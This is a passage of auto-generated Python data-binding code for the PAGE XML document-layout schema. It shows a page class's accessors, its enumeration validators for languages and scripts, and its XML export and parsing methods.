self.SeparatorRegion = SeparatorRegion
def add_SeparatorRegion(self, value):
self.SeparatorRegion.append(value)
def insert_SeparatorRegion_at(self, index, value):
self.SeparatorRegion.insert(index, value)
def replace_SeparatorRegion_at(self, index, value):
self.SeparatorRegion[index] = value
def get_MathsRegion(self):
return self.MathsRegion
def set_MathsRegion(self, MathsRegion):
self.MathsRegion = MathsRegion
def add_MathsRegion(self, value):
self.MathsRegion.append(value)
def insert_MathsRegion_at(self, index, value):
self.MathsRegion.insert(index, value)
def replace_MathsRegion_at(self, index, value):
self.MathsRegion[index] = value
def get_ChemRegion(self):
return self.ChemRegion
def set_ChemRegion(self, ChemRegion):
self.ChemRegion = ChemRegion
def add_ChemRegion(self, value):
self.ChemRegion.append(value)
def insert_ChemRegion_at(self, index, value):
self.ChemRegion.insert(index, value)
def replace_ChemRegion_at(self, index, value):
self.ChemRegion[index] = value
def get_MusicRegion(self):
return self.MusicRegion
def set_MusicRegion(self, MusicRegion):
self.MusicRegion = MusicRegion
def add_MusicRegion(self, value):
self.MusicRegion.append(value)
def insert_MusicRegion_at(self, index, value):
self.MusicRegion.insert(index, value)
def replace_MusicRegion_at(self, index, value):
self.MusicRegion[index] = value
def get_AdvertRegion(self):
return self.AdvertRegion
def set_AdvertRegion(self, AdvertRegion):
self.AdvertRegion = AdvertRegion
def add_AdvertRegion(self, value):
self.AdvertRegion.append(value)
def insert_AdvertRegion_at(self, index, value):
self.AdvertRegion.insert(index, value)
def replace_AdvertRegion_at(self, index, value):
self.AdvertRegion[index] = value
def get_NoiseRegion(self):
return self.NoiseRegion
def set_NoiseRegion(self, NoiseRegion):
self.NoiseRegion = NoiseRegion
def add_NoiseRegion(self, value):
self.NoiseRegion.append(value)
def insert_NoiseRegion_at(self, index, value):
self.NoiseRegion.insert(index, value)
def replace_NoiseRegion_at(self, index, value):
self.NoiseRegion[index] = value
def get_UnknownRegion(self):
return self.UnknownRegion
def set_UnknownRegion(self, UnknownRegion):
self.UnknownRegion = UnknownRegion
def add_UnknownRegion(self, value):
self.UnknownRegion.append(value)
def insert_UnknownRegion_at(self, index, value):
self.UnknownRegion.insert(index, value)
def replace_UnknownRegion_at(self, index, value):
self.UnknownRegion[index] = value
def get_CustomRegion(self):
return self.CustomRegion
def set_CustomRegion(self, CustomRegion):
self.CustomRegion = CustomRegion
def add_CustomRegion(self, value):
self.CustomRegion.append(value)
def insert_CustomRegion_at(self, index, value):
self.CustomRegion.insert(index, value)
def replace_CustomRegion_at(self, index, value):
self.CustomRegion[index] = value
def get_imageFilename(self):
return self.imageFilename
def set_imageFilename(self, imageFilename):
self.imageFilename = imageFilename
def get_imageWidth(self):
return self.imageWidth
def set_imageWidth(self, imageWidth):
self.imageWidth = imageWidth
def get_imageHeight(self):
return self.imageHeight
def set_imageHeight(self, imageHeight):
self.imageHeight = imageHeight
def get_imageXResolution(self):
return self.imageXResolution
def set_imageXResolution(self, imageXResolution):
self.imageXResolution = imageXResolution
def get_imageYResolution(self):
return self.imageYResolution
def set_imageYResolution(self, imageYResolution):
self.imageYResolution = imageYResolution
def get_imageResolutionUnit(self):
return self.imageResolutionUnit
def set_imageResolutionUnit(self, imageResolutionUnit):
self.imageResolutionUnit = imageResolutionUnit
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_primaryLanguage(self):
return self.primaryLanguage
def set_primaryLanguage(self, primaryLanguage):
self.primaryLanguage = primaryLanguage
def get_secondaryLanguage(self):
return self.secondaryLanguage
def set_secondaryLanguage(self, secondaryLanguage):
self.secondaryLanguage = secondaryLanguage
def get_primaryScript(self):
return self.primaryScript
def set_primaryScript(self, primaryScript):
self.primaryScript = primaryScript
def get_secondaryScript(self):
return self.secondaryScript
def set_secondaryScript(self, secondaryScript):
self.secondaryScript = secondaryScript
def get_readingDirection(self):
return self.readingDirection
def set_readingDirection(self, readingDirection):
self.readingDirection = readingDirection
def get_textLineOrder(self):
return self.textLineOrder
def set_textLineOrder(self, textLineOrder):
self.textLineOrder = textLineOrder
def get_conf(self):
return self.conf
def set_conf(self, conf):
self.conf = conf
def validate_imageResolutionUnitType(self, value):
# Validate type imageResolutionUnitType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['PPI', 'PPCM', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on imageResolutionUnitType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_PageTypeSimpleType(self, value):
# Validate type pc:PageTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['front-cover', 'back-cover', 'title', 'table-of-contents', 'index', 'content', 'blank', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on PageTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_LanguageSimpleType(self, value):
# Validate type pc:LanguageSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Abkhaz', 'Afar', 'Afrikaans', 'Akan', 'Albanian', 'Amharic', 'Arabic', 'Aragonese', 'Armenian', 'Assamese', 'Avaric', 'Avestan', 'Aymara', 'Azerbaijani', 'Bambara', 'Bashkir', 'Basque', 'Belarusian', 'Bengali', 'Bihari', 'Bislama', 'Bosnian', 'Breton', 'Bulgarian', 'Burmese', 'Cambodian', 'Cantonese', 'Catalan', 'Chamorro', 'Chechen', 'Chichewa', 'Chinese', 'Chuvash', 'Cornish', 'Corsican', 'Cree', 'Croatian', 'Czech', 'Danish', 'Divehi', 'Dutch', 'Dzongkha', 'English', 'Esperanto', 'Estonian', 'Ewe', 'Faroese', 'Fijian', 'Finnish', 'French', 'Fula', 'Gaelic', 'Galician', 'Ganda', 'Georgian', 'German', 'Greek', 'Guaraní', 'Gujarati', 'Haitian', 'Hausa', 'Hebrew', 'Herero', 'Hindi', 'Hiri Motu', 'Hungarian', 'Icelandic', 'Ido', 'Igbo', 'Indonesian', 'Interlingua', 'Interlingue', 'Inuktitut', 'Inupiaq', 'Irish', 'Italian', 'Japanese', 'Javanese', 'Kalaallisut', 'Kannada', 'Kanuri', 'Kashmiri', 'Kazakh', 'Khmer', 'Kikuyu', 'Kinyarwanda', 'Kirundi', 'Komi', 'Kongo', 'Korean', 'Kurdish', 'Kwanyama', 'Kyrgyz', 'Lao', 'Latin', 'Latvian', 'Limburgish', 'Lingala', 'Lithuanian', 'Luba-Katanga', 'Luxembourgish', 'Macedonian', 'Malagasy', 'Malay', 'Malayalam', 'Maltese', 'Manx', 'Māori', 'Marathi', 'Marshallese', 'Mongolian', 'Nauru', 'Navajo', 'Ndonga', 'Nepali', 'North Ndebele', 'Northern Sami', 'Norwegian', 'Norwegian Bokmål', 'Norwegian Nynorsk', 'Nuosu', 'Occitan', 'Ojibwe', 'Old Church Slavonic', 'Oriya', 'Oromo', 'Ossetian', 'Pāli', 'Panjabi', 'Pashto', 'Persian', 'Polish', 'Portuguese', 'Punjabi', 'Quechua', 'Romanian', 'Romansh', 'Russian', 'Samoan', 'Sango', 'Sanskrit', 'Sardinian', 'Serbian', 'Shona', 'Sindhi', 'Sinhala', 'Slovak', 'Slovene', 'Somali', 'South Ndebele', 'Southern Sotho', 'Spanish', 'Sundanese', 'Swahili', 'Swati', 'Swedish', 'Tagalog', 'Tahitian', 'Tajik', 'Tamil', 'Tatar', 'Telugu', 'Thai', 'Tibetan', 'Tigrinya', 'Tonga', 'Tsonga', 'Tswana', 'Turkish', 'Turkmen', 'Twi', 'Uighur', 'Ukrainian', 'Urdu', 'Uzbek', 'Venda', 'Vietnamese', 'Volapük', 'Walloon', 'Welsh', 'Western Frisian', 'Wolof', 'Xhosa', 'Yiddish', 'Yoruba', 'Zhuang', 'Zulu', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on LanguageSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ScriptSimpleType(self, value):
# Validate type pc:ScriptSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha (Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ReadingDirectionSimpleType(self, value):
# Validate type pc:ReadingDirectionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left-to-right', 'right-to-left', 'top-to-bottom', 'bottom-to-top']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ReadingDirectionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_TextLineOrderSimpleType(self, value):
# Validate type pc:TextLineOrderSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['top-to-bottom', 'bottom-to-top', 'left-to-right', 'right-to-left']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on TextLineOrderSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ConfSimpleType(self, value):
# Validate type pc:ConfSimpleType, a restriction on float.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, float):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
if value > 1:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.AlternativeImage or
self.Border is not None or
self.PrintSpace is not None or
self.ReadingOrder is not None or
self.Layers is not None or
self.Relations is not None or
self.TextStyle is not None or
self.UserDefined is not None or
self.Labels or
self.TextRegion or
self.ImageRegion or
self.LineDrawingRegion or
self.GraphicRegion or
self.TableRegion or
self.ChartRegion or
self.MapRegion or
self.SeparatorRegion or
self.MathsRegion or
self.ChemRegion or
self.MusicRegion or
self.AdvertRegion or
self.NoiseRegion or
self.UnknownRegion or
self.CustomRegion
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PageType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('PageType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'PageType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='PageType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='PageType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='PageType'):
if self.imageFilename is not None and 'imageFilename' not in already_processed:
already_processed.add('imageFilename')
outfile.write(' imageFilename=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.imageFilename), input_name='imageFilename')), ))
if self.imageWidth is not None and 'imageWidth' not in already_processed:
already_processed.add('imageWidth')
outfile.write(' imageWidth="%s"' % self.gds_format_integer(self.imageWidth, input_name='imageWidth'))
if self.imageHeight is not None and 'imageHeight' not in already_processed:
already_processed.add('imageHeight')
outfile.write(' imageHeight="%s"' % self.gds_format_integer(self.imageHeight, input_name='imageHeight'))
if self.imageXResolution is not None and 'imageXResolution' not in already_processed:
already_processed.add('imageXResolution')
outfile.write(' imageXResolution="%s"' % self.gds_format_float(self.imageXResolution, input_name='imageXResolution'))
if self.imageYResolution is not None and 'imageYResolution' not in already_processed:
already_processed.add('imageYResolution')
outfile.write(' imageYResolution="%s"' % self.gds_format_float(self.imageYResolution, input_name='imageYResolution'))
if self.imageResolutionUnit is not None and 'imageResolutionUnit' not in already_processed:
already_processed.add('imageResolutionUnit')
outfile.write(' imageResolutionUnit=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.imageResolutionUnit), input_name='imageResolutionUnit')), ))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.primaryLanguage is not None and 'primaryLanguage' not in already_processed:
already_processed.add('primaryLanguage')
outfile.write(' primaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryLanguage), input_name='primaryLanguage')), ))
if self.secondaryLanguage is not None and 'secondaryLanguage' not in already_processed:
already_processed.add('secondaryLanguage')
outfile.write(' secondaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryLanguage), input_name='secondaryLanguage')), ))
if self.primaryScript is not None and 'primaryScript' not in already_processed:
already_processed.add('primaryScript')
outfile.write(' primaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryScript), input_name='primaryScript')), ))
if self.secondaryScript is not None and 'secondaryScript' not in already_processed:
already_processed.add('secondaryScript')
outfile.write(' secondaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryScript), input_name='secondaryScript')), ))
if self.readingDirection is not None and 'readingDirection' not in already_processed:
already_processed.add('readingDirection')
outfile.write(' readingDirection=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.readingDirection), input_name='readingDirection')), ))
if self.textLineOrder is not None and 'textLineOrder' not in already_processed:
already_processed.add('textLineOrder')
outfile.write(' textLineOrder=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.textLineOrder), input_name='textLineOrder')), ))
if self.conf is not None and 'conf' not in already_processed:
already_processed.add('conf')
outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PageType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for AlternativeImage_ in self.AlternativeImage:
namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
if self.Border is not None:
namespaceprefix_ = self.Border_nsprefix_ + ':' if (UseCapturedNS_ and self.Border_nsprefix_) else ''
self.Border.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Border', pretty_print=pretty_print)
if self.PrintSpace is not None:
namespaceprefix_ = self.PrintSpace_nsprefix_ + ':' if (UseCapturedNS_ and self.PrintSpace_nsprefix_) else ''
self.PrintSpace.export(outfile, level, namespaceprefix_, namespacedef_='', name_='PrintSpace', pretty_print=pretty_print)
if self.ReadingOrder is not None:
namespaceprefix_ = self.ReadingOrder_nsprefix_ + ':' if (UseCapturedNS_ and self.ReadingOrder_nsprefix_) else ''
self.ReadingOrder.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ReadingOrder', pretty_print=pretty_print)
if self.Layers is not None:
namespaceprefix_ = self.Layers_nsprefix_ + ':' if (UseCapturedNS_ and self.Layers_nsprefix_) else ''
self.Layers.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Layers', pretty_print=pretty_print)
if self.Relations is not None:
namespaceprefix_ = self.Relations_nsprefix_ + ':' if (UseCapturedNS_ and self.Relations_nsprefix_) else ''
self.Relations.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Relations', pretty_print=pretty_print)
if self.TextStyle is not None:
namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
for TextRegion_ in self.TextRegion:
namespaceprefix_ = self.TextRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.TextRegion_nsprefix_) else ''
TextRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextRegion', pretty_print=pretty_print)
for ImageRegion_ in self.ImageRegion:
namespaceprefix_ = self.ImageRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ImageRegion_nsprefix_) else ''
ImageRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ImageRegion', pretty_print=pretty_print)
for LineDrawingRegion_ in self.LineDrawingRegion:
namespaceprefix_ = self.LineDrawingRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.LineDrawingRegion_nsprefix_) else ''
LineDrawingRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='LineDrawingRegion', pretty_print=pretty_print)
for GraphicRegion_ in self.GraphicRegion:
namespaceprefix_ = self.GraphicRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.GraphicRegion_nsprefix_) else ''
GraphicRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='GraphicRegion', pretty_print=pretty_print)
for TableRegion_ in self.TableRegion:
namespaceprefix_ = self.TableRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.TableRegion_nsprefix_) else ''
TableRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TableRegion', pretty_print=pretty_print)
for ChartRegion_ in self.ChartRegion:
namespaceprefix_ = self.ChartRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ChartRegion_nsprefix_) else ''
ChartRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ChartRegion', pretty_print=pretty_print)
for MapRegion_ in self.MapRegion:
namespaceprefix_ = self.MapRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MapRegion_nsprefix_) else ''
MapRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MapRegion', pretty_print=pretty_print)
for SeparatorRegion_ in self.SeparatorRegion:
namespaceprefix_ = self.SeparatorRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.SeparatorRegion_nsprefix_) else ''
SeparatorRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='SeparatorRegion', pretty_print=pretty_print)
for MathsRegion_ in self.MathsRegion:
namespaceprefix_ = self.MathsRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MathsRegion_nsprefix_) else ''
MathsRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MathsRegion', pretty_print=pretty_print)
for ChemRegion_ in self.ChemRegion:
namespaceprefix_ = self.ChemRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ChemRegion_nsprefix_) else ''
ChemRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ChemRegion', pretty_print=pretty_print)
for MusicRegion_ in self.MusicRegion:
namespaceprefix_ = self.MusicRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MusicRegion_nsprefix_) else ''
MusicRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MusicRegion', pretty_print=pretty_print)
for AdvertRegion_ in self.AdvertRegion:
namespaceprefix_ = self.AdvertRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.AdvertRegion_nsprefix_) else ''
AdvertRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AdvertRegion', pretty_print=pretty_print)
for NoiseRegion_ in self.NoiseRegion:
namespaceprefix_ = self.NoiseRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.NoiseRegion_nsprefix_) else ''
NoiseRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='NoiseRegion', pretty_print=pretty_print)
for UnknownRegion_ in self.UnknownRegion:
namespaceprefix_ = self.UnknownRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.UnknownRegion_nsprefix_) else ''
UnknownRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnknownRegion', pretty_print=pretty_print)
for CustomRegion_ in self.CustomRegion:
namespaceprefix_ = self.CustomRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.CustomRegion_nsprefix_) else ''
CustomRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='CustomRegion', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('imageFilename', node)
if value is not None and 'imageFilename' not in already_processed:
already_processed.add('imageFilename')
self.imageFilename = value
value = find_attr_value_('imageWidth', node)
if value is not None and 'imageWidth' not in already_processed:
already_processed.add('imageWidth')
self.imageWidth = self.gds_parse_integer(value, node, 'imageWidth')
value = find_attr_value_('imageHeight', node)
if value is not None and 'imageHeight' not in already_processed:
already_processed.add('imageHeight')
self.imageHeight = self.gds_parse_integer(value, node, 'imageHeight')
value = find_attr_value_('imageXResolution', node)
if value is not None and 'imageXResolution' not in already_processed:
already_processed.add('imageXResolution')
value = self.gds_parse_float(value, node, 'imageXResolution')
self.imageXResolution = value
